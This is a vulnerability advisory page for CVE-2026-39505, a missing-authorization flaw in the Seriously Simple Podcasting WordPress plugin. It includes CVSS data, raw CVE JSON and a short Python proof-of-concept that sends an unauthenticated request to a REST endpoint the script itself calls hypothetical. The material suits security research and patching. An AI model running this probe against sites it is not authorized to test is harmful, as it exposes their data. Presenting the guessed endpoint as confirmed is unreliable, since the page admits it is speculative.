Security Vulnerability Report
中文
CVE-2026-39505 CVSS 5.3 MEDIUM

CVE-2026-39505

Published: 2026-04-08 09:16:25
Last Modified: 2026-04-24 18:08:35

Description

Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Seriously Simple Podcasting <= 3.14.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_cve_2026_39505(target_url): """ PoC for CVE-2026-39505: Missing Authorization in Seriously Simple Podcasting. Attempts to access a restricted endpoint without authentication. """ # Hypothetical vulnerable endpoint based on plugin structure # This endpoint typically requires authentication but is exposed due to the bug. api_endpoint = "/wp-json/ss-podcasting/v1/podcasts/all" try: full_url = f"{target_url.rstrip('/')}{api_endpoint}" headers = { "User-Agent": "CVE-2026-39505-Scanner/1.0" } response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() # Check if we actually received podcast data (Confidentiality Leak) if data and isinstance(data, list): print(f"[+] Vulnerability Confirmed at: {full_url}") print(f"[+] Successfully retrieved data without authentication.") return True print("[-] Vulnerability not detected or endpoint requires patch.") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False except ValueError: print("[-] Response was not valid JSON.") return False # Usage Example # target = "http://example-wordpress-site.com" # check_cve_2026_39505(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39505", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:24.647", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-14-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}